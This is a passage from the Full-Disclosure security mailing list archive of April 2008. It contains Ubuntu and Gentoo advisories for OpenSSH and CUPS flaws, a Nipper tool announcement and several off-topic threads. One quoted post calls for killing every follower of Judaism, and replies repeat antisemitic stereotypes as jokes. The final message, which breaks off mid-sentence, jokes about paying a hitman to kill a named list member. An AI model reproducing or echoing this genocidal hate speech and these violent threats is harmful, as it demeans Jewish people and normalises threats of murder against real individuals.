In-Reply-To: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
	<29471.1207094777@turing-police.cc.vt.edu>
	<2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
Message-ID: <200804011447.07910.prb@lava.net>

On Tuesday 01 April 2008 14:28:57 T Biehn wrote:
> Valdis,
> Never took you for a anti-Semite.

Maybe you haven't read enough of Valdis' posts. He knows a lot about security, 
but often writes with tongue firmly planted in cheek. There really isn't a 
better response to these kinds of rants.

> On Tue, Apr 1, 2008 at 8:06 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> > On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
> >  > Why should we leave a single follower of such a filthy, greedy
> >  > religion alive? Do any of you have an idea?
> >
> >  You're just sore because they thought of the meme "All the riches
> > rightfully belong to those of our religion" before your religion did...
> >
> > _______________________________________________
> >  Full-Disclosure - We believe in it.
> >  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >  Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky



From kees at ubuntu.com  Wed Apr  2 01:46:52 2008
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 1 Apr 2008 17:46:52 -0700
Subject: [Full-disclosure] [USN-597-1] OpenSSH vulnerability
Message-ID: <20080402004652.GQ8254@outflux.net>

=========================================================== 
Ubuntu Security Notice USN-597-1             April 01, 2008
openssh vulnerability
CVE-2008-1483
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  openssh-client                  1:4.2p1-7ubuntu3.3

Ubuntu 6.10:
  openssh-client                  1:4.3p2-5ubuntu1.2

Ubuntu 7.04:
  openssh-client                  1:4.3p2-8ubuntu1.2

Ubuntu 7.10:
  openssh-client                  1:4.6p1-5ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Timo Juhani Lindfors discovered that the OpenSSH client, when port
forwarding was requested, would listen on any available address family.
A local attacker could exploit this flaw on systems with IPv6 enabled
to hijack connections, including X11 forwards.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.2p1-7ubuntu3.3.diff.gz
      Size/MD5:   171837 216f11e247dfeb681cd75c033cc2fc5c
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.2p1-7ubuntu3.3.dsc
      Size/MD5:     1003 3902e4c29bba7ee62b48c9641bd0bc76
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.2p1.orig.tar.gz
      Size/MD5:   928420 93295701e6bcd76fabd6a271654ed15c

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.2p1-7ubuntu3.3_all.deb
      Size/MD5:     1052 5e47eabdf3306595bef55704b3d80702

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.3_amd64.udeb
      Size/MD5:   165878 c18cc9d5cbf4f83e9e7730a43c18dba6
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.3_amd64.deb
      Size/MD5:   610832 5479cad40052592557e93b64536a45c6
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.3_amd64.deb
      Size/MD5:   236222 4d98f6e82ae9d26e73d12ec2e429dd14
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.3_amd64.deb
      Size/MD5:    87126 9e041ad9534dc99cb01aa6261acf071f
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.3_amd64.udeb
      Size/MD5:   182086 7b52e535986415799f89b04ea95df8ae

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.3_i386.udeb
      Size/MD5:   140116 99bac142d2bfd0d1bdd61ce8a6a917fc
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.3_i386.deb
      Size/MD5:   537108 c828718a152abc20cd547c39653ec67b
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.3_i386.deb
      Size/MD5:   205484 c495cf9d7d25e95b9d9baa9a873ccfca
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.3_i386.deb
      Size/MD5:    86768 a3a6c7aa8840720498b811b5a0b814b5
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.3_i386.udeb
      Size/MD5:   151548 c657878eb1b8a91897925914aab0bab8

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.3_powerpc.udeb
      Size/MD5:   158552 4aada820956ab80eb424713956347551
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.3_powerpc.deb
      Size/MD5:   594088 26dbbb6ff0359f11dfe280f06d9ebaf0
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.3_powerpc.deb
      Size/MD5:   226268 8916980ee9d4ef41b77a89ca56f891d9
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.3_powerpc.deb
      Size/MD5:    88420 dca6aabe6e164cd90e2b35cffe934a14
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.3_powerpc.udeb
      Size/MD5:   165904 e6e6f51d1c67732ed9dbc7fad4669ef0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.3_sparc.udeb
      Size/MD5:   149268 6a92b75179eea1972b082892bd8750de
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.3_sparc.deb
      Size/MD5:   543862 be125ef3611c0aa2f2e5ed0f8c36a250
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.3_sparc.deb
      Size/MD5:   208864 9f9c4e3b1ec44ccda77a00e674f200be
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.3_sparc.deb
      Size/MD5:    86794 1e6fceb45f5732053ab06be561b089b3
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.3_sparc.udeb
      Size/MD5:   160702 b5195d1a74c787b35a7517b0c53ba63b

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-5ubuntu1.2.diff.gz
      Size/MD5:   168042 5672e4c18795bbedbe025d80cee170c0
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-5ubuntu1.2.dsc
      Size/MD5:     1008 22075bd89d5030cd40e3eddf56b51958
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
      Size/MD5:   920186 239fc801443acaffd4c1f111948ee69c

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.3p2-5ubuntu1.2_all.deb
      Size/MD5:     1100 61ffbef59843a549f742da88c456e309

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-5ubuntu1.2_amd64.udeb
      Size/MD5:   171956 12d9cc34858461aec2af702a80455e84
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-5ubuntu1.2_amd64.deb
      Size/MD5:   662860 c94742bbd1fc245961c1457c28d4a620
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-5ubuntu1.2_amd64.deb
      Size/MD5:   240798 c5710561e171555dc9d51407b91f67c8
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-5ubuntu1.2_amd64.deb
      Size/MD5:   100026 88915b91b746ae83ae6446fad2097159
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.3p2-5ubuntu1.2_amd64.udeb
      Size/MD5:   183810 bebfe8b9c8c214943ea34f57b4be0e73

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-5ubuntu1.2_i386.udeb
      Size/MD5:   155430 ba07c6d05c5b2fcfab23525ab1d2a9e2
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-5ubuntu1.2_i386.deb
      Size/MD5:   612374 cec1d2eb7071bd77af0f97bdd1e87127
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-5ubuntu1.2_i386.deb
      Size/MD5:   217444 ac4a4ea32498fcfb85555ef7eed06f47
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-5ubuntu1.2_i386.deb
      Size/MD5:    99750 c393d03129303dacabe615941a236d70
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.3p2-5ubuntu1.2_i386.udeb
      Size/MD5:   162594 c0bfed177f9ada9861e499ebb763d79d

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-5ubuntu1.2_powerpc.udeb
      Size/MD5:   169730 224851fea13b7c3710fc8995772f0a45
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-5ubuntu1.2_powerpc.deb
      Size/MD5:   651210 181d78aa90afc797f6e6a513c4e9d2b5
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-5ubuntu1.2_powerpc.deb
      Size/MD5:   232302 16847acac5b087337bb02cf4d4fd57ef
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-5ubuntu1.2_powerpc.deb
      Size/MD5:   101312 c95917858fdc4fe937e6ab63e17973c3
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.3p2-5ubuntu1.2_powerpc.udeb
      Size/MD5:   172480 7228dc84886c03652e50a2b84745224b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-5ubuntu1.2_sparc.udeb
      Size/MD5:   160058 0d9ad412a2e50a4f62c950c111419887
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-5ubuntu1.2_sparc.deb
      Size/MD5:   599452 ee374a2e26423cc41422b4cea24ebb75
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-5ubuntu1.2_sparc.deb
      Size/MD5:   214388 7e470015f5705e7c866692c08364dfa4
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-5ubuntu1.2_sparc.deb
      Size/MD5:    99704 7eca83add879793d979af67d9a287425
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.3p2-5ubuntu1.2_sparc.udeb
      Size/MD5:   166838 6115b3e0baa6e32b851cbfe8f21b99af

Updated packages for Ubuntu 7.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-8ubuntu1.2.diff.gz
      Size/MD5:   265384 fed3e4874f40b6475edd015b654693ca
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-8ubuntu1.2.dsc
      Size/MD5:     1074 cd1a6520c1dca6eb6f9479d3c6c81cea
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
      Size/MD5:   920186 239fc801443acaffd4c1f111948ee69c

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.3p2-8ubuntu1.2_all.deb
      Size/MD5:     1084 c66f25a64619593a467260c38d3113d9
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/ssh-krb5_4.3p2-8ubuntu1.2_all.deb
      Size/MD5:    93068 221e4a1b96fc9a5be476f6095c65b35c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.2_amd64.udeb
      Size/MD5:   172486 111d3628f5c3a7d9b7e1bb04438a4093
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.2_amd64.deb
      Size/MD5:   691282 7094027a354d92154f4193f67fe88201
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.2_amd64.udeb
      Size/MD5:   184488 5beea05c07e0a614dbcbb8ea663853bb
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.2_amd64.deb
      Size/MD5:   254096 2f8686e2da6b7a55864f809a46c1be02
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.2_amd64.deb
      Size/MD5:   101438 bf59a63f2fb039d23582db8907b5978f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.2_i386.udeb
      Size/MD5:   155802 9e64db938cc7eb701ae541b90c1f76ce
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.2_i386.deb
      Size/MD5:   654874 770a9632542f4456ce57db9ccefef8dc
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.2_i386.udeb
      Size/MD5:   162994 907b641a56f0330eba2099ce3a8fc543
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.2_i386.deb
      Size/MD5:   236022 e9ae72242b33aef00ea801dd7e8f447b
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.2_i386.deb
      Size/MD5:   101150 613d2dd5213af02a3bc081234422e795

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.2_powerpc.udeb
      Size/MD5:   177386 b58f7bc4b63e86c2347c7f69a247d2b2
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.2_powerpc.deb
      Size/MD5:   712516 47a0be3beb6f0aaa616d4cee568c3a72
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.2_powerpc.udeb
      Size/MD5:   180834 447c4a8e80fd7255c2d0c9448fd19d6b
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.2_powerpc.deb
      Size/MD5:   257010 c1c5731be72a82f93b7ed3215e432d0f
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.2_powerpc.deb
      Size/MD5:   103906 3133a245c90ab9edc08c425d2d4b4a5e

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.2_sparc.udeb
      Size/MD5:   163268 1bbf94e36877e3a36624746c3f895858
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.2_sparc.deb
      Size/MD5:   702316 30a773daf182c4d156922fa3e61a0826
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.2_sparc.udeb
      Size/MD5:   170356 c8647ecc728d77aaadc29395396e93db
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.2_sparc.deb
      Size/MD5:   261142 b1f4e31c6f0882f2973f7e81c47a0385
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.2_sparc.deb
      Size/MD5:   101390 a91dc46eb0726f06133717df9d054e80

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.6p1-5ubuntu0.2.diff.gz
      Size/MD5:   188249 4a5cfad0640d13b665ecdf7fc2685ee3
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.6p1-5ubuntu0.2.dsc
      Size/MD5:     1169 47fc3f0e3cfc6e5ae9f11948fd287165
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.6p1.orig.tar.gz
      Size/MD5:   946439 cee58cd226138191561fa2d484e18f49

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.6p1-5ubuntu0.2_all.deb
      Size/MD5:     1094 7ebb9c93e0ce5e2abd99e53df6447741
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/ssh-krb5_4.6p1-5ubuntu0.2_all.deb
      Size/MD5:    80244 de8bc5959a6a5962d3c9d646bba5c7bb

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.2_amd64.udeb
      Size/MD5:   175878 b11a5712beef7547615dcba520d2e323
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.2_amd64.deb
      Size/MD5:   696454 a3d8d59c019a494cc821fb1169940674
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.2_amd64.udeb
      Size/MD5:   191976 cef956003caa9ae201e49b687afabd75
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.2_amd64.deb
      Size/MD5:   266714 2fa98d4f7910ed6eb6e5c01c3d9fdc67
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.2_amd64.deb
      Size/MD5:    88382 ec70425a10aa35781175b19422c06ec5

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.2_i386.udeb
      Size/MD5:   158194 0cfdf097b212a881220b920273f6c37a
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.2_i386.deb
      Size/MD5:   656828 bf563187fbbd6eb6bd08467f522a4749
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.2_i386.udeb
      Size/MD5:   169028 d44cd4a31b1a8e879e2a44220847a246
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.2_i386.deb
      Size/MD5:   247578 e91b2014ac012f6276746390ee68b584
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.2_i386.deb
      Size/MD5:    88032 95ad2c683cf079ebf1e2207bef66a876

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.2_powerpc.udeb
      Size/MD5:   180234 5e3cd63862b4659de83de44299d1e153
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.2_powerpc.deb
      Size/MD5:   717230 14e30fed3d0dade9bd851df3b125cf0e
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.2_powerpc.udeb
      Size/MD5:   187310 f23b8a5fa0b602f21ec230c8ebc442a7
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.2_powerpc.deb
      Size/MD5:   269624 3d2cd008a087d3deecb7d65e54517f01
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.2_powerpc.deb
      Size/MD5:    90756 43aa8a4cd34884f24e5c412d581e87cb

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.2_sparc.udeb
      Size/MD5:   166152 4bb1de1ee32945c51f492e95aa47b350
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.2_sparc.deb
      Size/MD5:   707646 a97dd22b1a8181239b4483689f876430
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.2_sparc.udeb
      Size/MD5:   176762 0eff3109cf41ece689470902599e8e4a
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.2_sparc.deb
      Size/MD5:   274528 978fecd7269599ea851d972ef3b3d6a6
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.2_sparc.deb
      Size/MD5:    88352 b60a65f9604f90c7618ebd1a565ae5e2

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/91b845e1/attachment.bin 

From infolookup at gmail.com  Wed Apr  2 02:48:13 2008
From: infolookup at gmail.com (infolookup at gmail.com)
Date: Wed, 2 Apr 2008 01:48:13 +0000
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <29471.1207094777@turing-police.cc.vt.edu>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com><29471.1207094777@turing-police.cc.vt.edu>
Message-ID: <2112875235-1207100888-cardhu_decombobulator_blackberry.rim.net-959436740-@bxe139.bisx.prod.on.blackberry>

Both Jews and Gentiles that's what the word says.
Sent from my Verizon Wireless BlackBerry

-----Original Message-----
From: Valdis.Kletnieks at vt.edu

Date: Tue, 01 Apr 2008 20:06:17 
To:Andrew A <gluttony at gmail.com>
Cc:Full Disclosure <full-disclosure at lists.grok.org.uk>
Subject: Re: [Full-disclosure] Greedy Jews fact of the day


On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:

> Why should we leave a single follower of such a filthy, greedy religion
> alive? Do any of you have an idea?

You're just sore because they thought of the meme "All the riches rightfully
belong to those of our religion" before your religion did...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




From winsoc at googlemail.com  Tue Apr  1 22:03:50 2008
From: winsoc at googlemail.com (winsoc)
Date: Tue, 1 Apr 2008 22:03:50 +0100
Subject: [Full-disclosure] FW: [ GLSA 200804-01 ] CUPS: Multiple
	vulnerabilities
Message-ID: <006101c8943b$e3d70500$ab850f00$@com>

Nice find though

-----Original Message-----
From: winsoc [mailto:winsoc at gmail.com] 
Sent: 01 April 2008 22:03
To: 'Robert Buchholz'
Subject: RE: [Full-disclosure] [ GLSA 200804-01 ] CUPS: Multiple
vulnerabilities

Hey, I'm curious as to why this service is available as default- especially
on Suse OS.
I mean this is not M$ shit we're talking about, did someone oversee this or
what...

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Robert
Buchholz
Sent: 01 April 2008 20:17
To: gentoo-announce at gentoo.org
Cc: full-disclosure at lists.grok.org.uk; bugtraq at securityfocus.com;
security-alerts at linuxsecurity.com
Subject: [Full-disclosure] [ GLSA 200804-01 ] CUPS: Multiple vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200804-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: CUPS: Multiple vulnerabilities
      Date: April 01, 2008
      Bugs: #211449, #212364, #214068
        ID: 200804-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in CUPS, allowing for the
remote execution of arbitrary code and a Denial of Service.

Background
==========

CUPS provides a portable printing layer for UNIX-based operating systems.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /   Vulnerable   /                     Unaffected
    -------------------------------------------------------------------
  1  net-print/cups      < 1.2.12-r7                      >= 1.2.12-r7

Description
===========

Multiple vulnerabilities have been reported in CUPS:

* regenrecht (VeriSign iDefense) discovered that the
  cgiCompileSearch() function used in several CGI scripts in CUPS'
  administration interface does not correctly calculate boundaries when
  processing a user-provided regular expression, leading to a
  heap-based buffer overflow (CVE-2008-0047).

* Helge Blischke reported a double free() vulnerability in the
  process_browse_data() function when adding or removing remote shared
  printers (CVE-2008-0882).

* Tomas Hoger (Red Hat) reported that the gif_read_lzw() function
  uses the code_size value from GIF images without properly checking
  it, leading to a buffer overflow (CVE-2008-1373).

* An unspecified input validation error was discovered in the HP-GL/2
  filter (CVE-2008-0053).

Impact
======

A local attacker could send specially crafted network packets or print jobs
and possibly execute arbitrary code with the privileges of the user running
CUPS (usually lp), or cause a Denial of Service. The vulnerabilities are
exploitable via the network when CUPS is sharing printers remotely.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All CUPS users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-print/cups-1.2.12-r7"

References
==========

  [ 1 ] CVE-2008-0047
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047
  [ 2 ] CVE-2008-0053
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0053
  [ 3 ] CVE-2008-0882
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0882
  [ 4 ] CVE-2008-1373
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo
Security Website:

  http://security.gentoo.org/glsa/glsa-200804-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality
and security of our users machines is of utmost importance to us. Any
security concerns should be addressed to security at gentoo.org or
alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its
owner(s).

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



From fizz at titania.co.uk  Wed Apr  2 09:02:05 2008
From: fizz at titania.co.uk (Fizz)
Date: Wed, 2 Apr 2008 09:02:05 +0100
Subject: [Full-disclosure] Nipper update released
Message-ID: <200804020902.05233.fizz@titania.co.uk>

Nipper is a network infrastructure parser. It processes configuration files 
from network devices and produces a report including a security audit of the 
device, configuration settings and other relevant information.

Nipper currently supports the following device types:

? * Cisco IOS-based routers
? * Cisco IOS-based catalysts
? * Cisco NMP-based catalysts
? * Cisco CatOS-based catalysts
? * Cisco PIX-based Firewalls
? * Cisco ASA-based Firewalls
? * Cisco FWSM-based Firewalls
? * Cisco Content Service Switches
? * Juniper ScreenOS-based Firewalls (NetScreen)
? * Nortel Passport devices
? * CheckPoint Firewall-1 Firewalls
? * Sonicwall SonicOS-based Firewalls
  * Bay Networks Accelar
  * Nokia IP Firewalls

The security audit includes details of the findings, together with detailed 
recommendations. The security audit can be modified using command line 
parameters or an external configuration file.

This update (0.11.5) includes improvements to the report output, some minor 
PQR issues have been resolved. It also includes bug fixes for issues 
identified by the community.

Nipper is available for Linux, Windows and other platforms. More information 
and downloads can be obtained from the project web site at 
http://nipper.titania.co.uk 

If you have access to device configuration files for network devices, please 
consider sending them to me. I will be discrete, but you are welcome to 
sanitise them first. However, if you do sanitise them, please ensure that the 
structure of the config file is not modified.

The project web site is http://nipper.titania.co.uk

Ian Ventura-Whiting



From wh1t3h4t3 at yahoo.co.uk  Wed Apr  2 11:02:47 2008
From: wh1t3h4t3 at yahoo.co.uk (Micheal Turner)
Date: Wed, 2 Apr 2008 11:02:47 +0100 (BST)
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
Message-ID: <639063.889.qm@web23315.mail.ird.yahoo.com>

Once upon a time in toy town, I offered to contract
the services of a professional hit-man to have n3td3v
executed - in part a joke, my black humour. However, I
have received so many donations from various gmail.com
addresses that I have just been able to purchase my
first car with the left-over change. As I type this
from my Lamborghini Diablo parked up in a car park at
London's heathrow eagerly awaiting the arrival of
"Aghbad", a delightful eastern european chap with a
pretty impressive handlebar mustache which matches the
